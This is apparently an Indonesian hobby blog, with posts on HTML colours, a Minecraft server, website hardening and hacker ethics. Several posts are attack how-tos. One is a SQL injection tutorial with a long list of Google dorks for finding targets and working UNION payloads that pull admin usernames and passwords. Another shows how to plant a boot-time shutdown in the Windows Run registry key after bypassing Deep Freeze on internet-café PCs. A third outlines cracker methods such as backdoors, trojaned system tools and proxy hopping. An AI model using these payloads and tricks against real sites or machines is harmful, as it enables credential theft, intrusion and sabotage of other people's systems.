Monday, January 14, 2013

Kode warna HTML

Mungkin ada beberapa yg bingung pas mau kasih warna di website,tapi ga tau kode HTMLnya.Atau yg suka design,pas editing photoshop.Masi kurang pas buat dapetin warna yg dimaksud.Dibawah ini saya lampirin chart kode warna HTML:
[Image: 1_zpsb4ae7dae.png]
[Image: 2_zps7abf6a60.png]
[Image: 3_zps42291241.png]
[Image: 4_zps9a12a7a7.png]
[Image: 5_zps45e55c5f.png]
[Image: 6_zps1f2d6a43.png]
[Image: 7_zps32ac39d2.png]
[Image: 8_zps63eb9593.png]
[Image: 9_zps24ef79a3.png]
[Image: 10_zps014d6b60.png]
[Image: 11_zpsf8e7f06d.png]
[Image: 12_zps22e564ec.png]
[Image: 13_zps05566e9b.png]
[Image: 14_zpse15b86e3.png]
[Image: 15_zps27c29a07.png]
Semoga bermanfaat!^^

Tutorial SQL Injection

Pengertian SQL Injection:
SQL Injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum SQL Injection pada MySQL:

Karakter: ' atau -
Comments: /* atau --
Information_schema untuk versi: mysql versi 5.x ,tidak support untuk mysql versi 4.x

Dork:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
===========
=Step Satu=
===========

Carilah target(masukkan dork kemudian search di g**gle)
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" Untuk melihat apakah ada pesan error.
Contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
Sehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=Step Dua=
==========

Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

Contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

Ceklah secara satupersatu.
Misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

Sehingga muncul error atau hilang pesan error...
Misal: [site]/berita.php?id=-100+order+by+9--

Berarti yang kita ambil adalah sampai angka 8 menjadi site]/berita.php?id=-100+order+by+8--

===========
=Step Tiga=
===========

Untuk mengeluarkan berapa angka yang muncul gunakan perintah union
Karena tadi error sampai angka 9
Maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Oke,seumpama yg keluar angka 5

Gunakan perintah version() atau @@version untuk mengecek versi SQL yg dipakai masukan perintah tsb pada nagka yg keluar tadi
Misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema.

Untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.

============
=Step Empat=
============

Untuk menampilkan table yg ada pada web tsb adalah
Perintah table_name >>> dimasukan pada angka yg keluar tadi
Perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=Step Lima=
===========

Untuk menampilkan semua isi dari table tsb adalah
Perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
Perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

=============
=Step Enam=
=============

Perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
Perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=Step Tujuh=
============

Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

Perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
Perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

Contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
=Step Delapan=
==============

Yahap terakhir mencari halam admin atau login

Sunday, January 13, 2013

Cara membuat komputer langsung shutdown ketika di nyalakan

  1. Buat shortcut "Klik Kanan" pada dekstop pilih "New" â–º "Shortcut" 
  2. Pada "Type the location of the item:" Ketikkan Shutdown -s -t "0"
  3. Klik "Next >" masukkan nama shortcutnya "Auto Off"
  4. Buka menu "Start" â–º "Klik Kanan" pada "All Program" â–º "Open" copy shortcut yang anda buat tadi ke directory "Start Menu"
  5. Kemudian buka "Regedit"
  6. Buka menu "Start" â–º "Run" â–º ketikkan "regedit" â–º "enter" atau "Winkey + R"
  7. Buka "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  8. Klik kanan pada windows "Run" pilih "String Value" masukkan nama stringnya "Auto Off"
  9. Double klik pada string "Auto Off" Pada "Value Data" masukkan address shortcutnya!(Contoh C:\Documents and Settings\Erik Cookies\Start Menu\Auto Off)
  10. Setelah kata "Start Menu" itu adalah nama shortcut yang anda buat tadi yaitu "Auto Off"
  11. Klik "OK"
  12. Kemudian tutup jendela "Registry Editor"
  13. Dan "Restart" komputer!
Jika komputer menggunakan Deepfreeze "Disable" kan Deepfreeze terlebih fahulu.
Kalo main di warnet,bobol Deepfreeze dengan Undeepfreeze bisa di cari di google
Usahakan bobol Deepfreezenya terlebih dahulu baru jalankan tutor di atas
Kalo enggak di bobol terlebih dahulu gak akan bisa.
Sekian tutor dari saya.
Jangan di gunakan untuk kejahatan ya.

Cara Balikinnya Adalah Waktu Komputer Hidupkan Pencet F5
Dan Pilih Safe Mode â–º Enter!
Setelah Proses Selesai
Biasanya Di Perintahkan Pilih User!
Pilih Aja User Yang Bukan Administrator!
Dan Setelah Masuk Ke Dekstop, Buka Ke Regedit Dan Masuk HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Klik Kanan Pada String Value Yang Anda Buat Tadi Dan Delete Restart Komputer!
Dan Auto Shutdown Pun Sudah Tidak Aktif.

Saturday, January 12, 2013

6 Langkah setup sebuah Minecraft Server[LINUX]

Baik disini saya akan menjelaskan bagaimana cara untuk melakukan setup server minecraft,jika belum tahu soal minecraft sedikit dari saya minecraft itu permainan sandbox dengan grafik yang usang.Ini sedang dalam alpha tapi itu masih sangat menyenangkan dan sangat adiktif,seru dah,ok langsung aja.

Persyaratan:

  • Sebuah mesin Linux [VPS / DEDICATED SERVER]
  • Koneksi Internet
  • Putty (Memungkinkan Anda untuk terhubung melalui SSH ke mesin Linux Anda

Sebelum kita mulai,saya ingin mengingatkan kalau ini untuk target yang kurang akrab dengan keluarga NIX*.Baik kita masuk ke cara kerja yang sederhana ini
1.Login ke mesin Linux Anda, Segera yang dituju adalah console:
input command:
# which java
Perintah tersebut untuk mengecek ada atau tidaknya java dalam PC kita:

(Pada mesin saya disini, tidak ada Java yang terinstal.Jadi,mari kita bersiap untuk menginstall java kita).
 

A.Instalasi Java
Jalankan perintah ini:
# yum install java-1.6.0-OpenJDK
Ini akan menginstal java versi 1.6(versinya bisa kita ganti semau kita,namun disini saya memberikannya hanya sebagai contoh dari tutorial yang akan saya sharing dengan teman-teman,kalau pakai debian tinggal diganti saja yum dengan apt-get install ok.

Mari kita lakukan hal itu, nanti akan ada pertanyaan yang akan meminta anda untuk memberikan hak akses atau izin kita untuk menginstal,hanya menjawab dengan "Y" untuk ya,kalau kita tidak ingin meneruskannya "N" saja agar prossesnya dibatalkan.

B.Oke,java sudah terinstall di PC,mari kita bergegas untuk memeriksanya sekarang.
Gunakan perintah which java kembali: 
# which java
Baiklah,sekarang kita akan mencoba cari tahu dimana letak dari file java tersebut.Yups,teman-teman betul sekali lokasinya adalah pada > /usr/bin/java/.

Selanjutnya masih berlanjut dengan yang tadi,

gunakan code:
# /Usr/bin/java/ -versi 
Sepertinya ada masalah mesin ini menyatakan kalau versi java saya adalah versi 1.4.2,Supaya tidak membuat bingung lanjutkan saja dengan java yang sudah terinstall tadi,dan kita mungkin akan menggunakan versi 1.6.

Ya kita butuh versi 1.6.

2.Baiklah, sekarang kita akan membuat direktori hanya untuk Minecraft.
code:
# mkdir minecraft

3.Sekarang mari kita jump kedalam direktori yang baru dibuat minecraft;
code:
# cd minecraft

4.Sekarang mari kita download file jar. untuk Minecraft.
code:
# wget http://minecraft.net/download/minecraft_server.jar

5.Sekarang yang harus kita lakukan adalah menjalankan server.
code:
# java -Xmx1024M -Xms1024M -jar minecraft_server.jar nogui

6.Sekarang anda akan melihat layar ini:

and the top:
Bagaimana teman-teman?Hal yang sangat gampang bukan untuk seorang newbie.

Thursday, January 10, 2013

Perbedaan Hacker Dan Cracker

Banyak dari kita yang salah pengertian tentang Hacker,seringkali masyarakat awam menganggap bahwa istilah Hacker dan Cracker adalah sama.Konotasinya hampir selalu negatif dan jahat.Padahal,ada diantara hackers yang berjasa besar karena menyelamatkan atau memperingatkan suatu sistem di Internet,sehingga si pemilik menyadari kelemahannya.Berikut ini adalah pengertian Hacker dan Cracker :
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi,membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti:pencurian data,penghapusan,dan banyak yang lainnya.


Hacker :


  1. Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs.Sebagai contoh:jika seorang hacker mencoba menguji suatu situs dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain.Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.Bahkan seorang hacker akan memberikan masukan dan saran yang bisa memperbaiki kebobolan system yang ia masuki.
  2. Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
  3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
  4. Seorang hacker akan selalu memperdalam ilmunya dan memperbanyak pemahaman tentang sistem operasi.
 
Cracker :

  1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan.Sebagia contoh:Virus,Pencurian Kartu Kredit,Kode Warez,Pembobolan Rekening Bank,Pencurian Password E-mail/Web Server.
  2. Bisa berdiri sendiri atau berkelompok dalam bertindak.
  3. Mempunyai website atau channel dalam IRC yang tersembunyi,hanya orang-orang tertentu yang bisa mengaksesnya.
  4. Mempunyai IP address yang tidak bisa dilacak.
  5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit,kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan.Sebagai contoh:Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama,kasus klikBCA.com yang paling hangat dibicarakan beberapa waktu yang lalu.
Ada Beberapa Jenis Kegiatan Hacking,Diantaranya Adalah :

  • Social Hacking,yang perlu diketahui:informasi tentang system apa yang dipergunakan oleh server,siapa pemilik server,siapa Admin yang mengelola server,koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet,mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut,apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.
  • Technical Hacking,merupakan tindakan teknis untuk melakukan penyusupan ke dalam system,baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service.Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.
Jadi dapat diambil kesimpulannya bahwa Hacker yang ‘baik’ adalah orang yang mengetahui apa yang dilakukannya,menyadari seluruh akibat dari apa yang dilakukannya,dan bertanggung jawab atas apa yang dilakukannya.
 
Sementara Hacker yang ‘jahat’ atau biasa disebut Cracker adalah orang yang tahu apa yang dikerjakannya,tetapi seringkali tidak menyadari akibat dari perbuatannya.Dan ia tidak mau bertanggung jawab atas apa yang telah diketahui dan dilakukannya itu.Karena hacker adalah orang yang tahu dalam ketahuannya,di dunia hackerstentu saja ada etika yang mesti dipenuhi dan dipatuhi bersama.

Lebih jauh lagi tentang Cracker,Cracker adalah seseorang yang berusaha untuk menembus sistem komputer orang lain atau menerobos sistem keamanan komputer orang lain untuk mengeruk keuntungan atau melakukan tindak kejahatan.


Inilah yang membedakannya dengan hacker.Prinsip kerja Hacker dan Cracker sebenarnya sama.Yang membedakan keduanya adalah tujuannya.Dari segi kemampuan,Cracker dan Hacker juga tidak jauh berbeda.Tapi Cracker seringkali memiliki ilmu yang lebih oke dan keberanian serta kenekatan yang lebih besar daripada Hacker.Namun dari segi mentalitas dan integritas,keduanya beda jauh.

Monday, January 7, 2013

Rahasia besar windows 7 "God mode"

Semua tentunya sudah sangat akrab dengan yang Namanya Windows 7 bukan?
Nah disini ane akan mengungkapkan sebuah rahasia Windows 7 yang disebut oleh Microsoft sebagai "God Mode"

Entah apa maksud dari Microsoft menggunakan nama ini tetapi silahkan anda coba sendiri.Cukup klik icon ini dan agan akan melihat segala sesuatu muncul di depan mata anda!Tidak perlu berlama-lama gan silahkan menyimak dan Langsung dicoba.

1.Buat folder baru disembarang tempat :
2.Lalu rename folder tersebut dengan kode ini :
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} 
3.Tekan enter dan silahkan buka folder yang di buat tadi:
 Anda akan langsung tertuju ke berbagai seting rahasia yang ada di windows 7.

Tips mengamankan website dari defacer

Sehubungan dengan maraknya deface (perubahan tampilan antarmuka) atau hacking isi situs (websites) pemerintah maupun organisasi besar maka berikut ini berbagai tips yang dapat dilakukan oleh web administrator untuk membangun Webserver yang tangguh dan tidak mudah dibobol oleh Hacker.

Berikut ini adalah beberapa tips dalam mengamankan situs/server yang tidak mudah di jebol Hacker :

Tips Pertama
Pada umumnya,hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu,lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel).Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection.Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server).Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized.Beda dengan Web Hosting,proteksi security dilakukan terserah apa kata ISP.Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.

Tips Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall,IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System).Contohnya mengunakan Fortigate,Cisco Series Security,3Com Tipping Point,dan lainnya.Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall,Monowall,Customized Distro Linux,dan lainnya.Umumnya,baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.

Tips Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya,sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan.Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/free license/freeware,sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable.Seperti adanya BUG pada software Joomla versi 1.5.0 – 1.5.5.

Tips Keempat
Web Administrator/System Administrator harus melakukan Review,Testing,Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya.Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security Web Servernya.

Hacker Indonesia Tembus Halaman Admin Facebook

Tentu kalau mendengar berita soal account profile Facebook teman kita yang di hack, itu hal yang biasa.Tapi kali ini ada hal yang jauh lebih luar biasa.Luar biasa karena kali ini yang dihack adalah halaman Administrator Facebook langsung! Halaman dimana setiap settings/pengaturan terkait layanan Facebook ini dilakukan.Dan, luar biasa yang kedua adalah bahwa yang melakukan itu semua ternyata seorang Hacker Indonesia berinisial Bi4kkob4r.Kalau kita telusuri melalui mbah Google, maka akan kita dapati situsnya beralamatkan di http://bi4kkob4r.net/
Berikut bukti halaman Administrator Facebook yg di hack:
Dan luar biasa yang ketiga,adalah bahwa ternyata Bi4kkob4r ini bukanlah gambaran sosok Hacker yang mengerikan seperti yang banyak digambarkan oleh kebanyakan orang yang diimajinasikan sebagai kelompok perusak,pencuri,dan segudang cap negatif lainnya (walau sebenarnya ciri-ciri seperti itu lebih tepat disandangkan untuk para Cracker dan bukan Hacker).Bi4kkobar ini hanya menunjukkan bahwa ia mampu menembus sistem keamanan situs Facebook tanpa melakukan pengubahan apapun terhadap situs tersebut.Untuk itulah kemudian ia mendapatkan reward dari pihak Facebook uang sebesar $2.000.
Ini screenshot bayaran yang diterimanya via paypal:
Nah,siapa bilang anak-anak bangsa Indonesia tidak bisa tampil unjuk gigi dalam bidang networking security di tingkat dunia?Dan semoga sikap Bi4kkob4r ini juga bisa diteladani oleh hacker-hacker (culun) Indonesia lainnya agar tidak cuma bisa merusak account Facebook orang lain yang cuma akan mendapatkan sumpah serapah.

PANDUAN UNTUK MEMULAI MENJADI HACKER ATAU CRACKER

Sama seperti sebelumnya pada postingan PANDUAN UNTUK MEMULAI MENJADI HACKER & CRACKER ini saya ambil dari blog tetangga dan saya yakin akan berguna bagi para pengguna internet.Postingan ini saya harapkan digunakan dengan baik bukan untuk para cracker yang biasanya mencuri gadget lewat internet.Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik.Sialnya,segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker.

Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni,disini kita berbicara seni keamanan jaringan Internet.Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker.Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain.Apalagi,pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham.Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol.

Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet.Apa boleh buat cybersquad,cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com,http://www.linuxfirewall.org/, http://www.linuxdoc.org,http://www.cerias.purdue.edu/coast/firewalls/,http://www.redhat.com/mirrors/LDP/HOWTO/.Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis).Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html,http://www.v-one.com/documents/fw-faq.html.Dan bagi para experimenter beberapa script dan program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/,http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org,http://www.bogor.net/idkf/,http://louis.idaman.com/idkf.Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/.Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini.Pada saat ini,saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri.Di samping,memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.Dijelaskan oleh Front-line Information Security Team, ”Techniques Adopted By ’System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk.Seorang Cracker umumnya pria usia 16-25 tahun.Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga.Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis.Melihat kelemahan sistem dengan mejalankan program scanner.Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka,(2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya.Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server.Melihat kondisi penggunaan di atas,kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan.Selain itu,dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan,teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh.Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate.Selain itu,melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.Setelah berhasil melompat dan memasuki sistem lain,cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan.Hal ini dilakukan dengan beberapa cara,misalnya (1) menggunakan nslookup untuk menjalankan perintah ’ls ’ ,(2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya,(3) melihat berbagai dokumen di FTP server,(4) menghubungkan diri ke mail server dan menggunakan perintah ’expn ’,dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja.Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan.Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /user/bin,/etc dan /home.Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan.Crackerbisa mengunakan program di Linux seperti ADMhack,mscan,nmap dan banyak scanner kecil lainnya.Program seperti ’ps’ & ’netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning.Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, makacracker akan menjalan program untuk menaklukan program daemon yang lemah di server.Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan).Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ’root’ (administrator tertinggi di server).

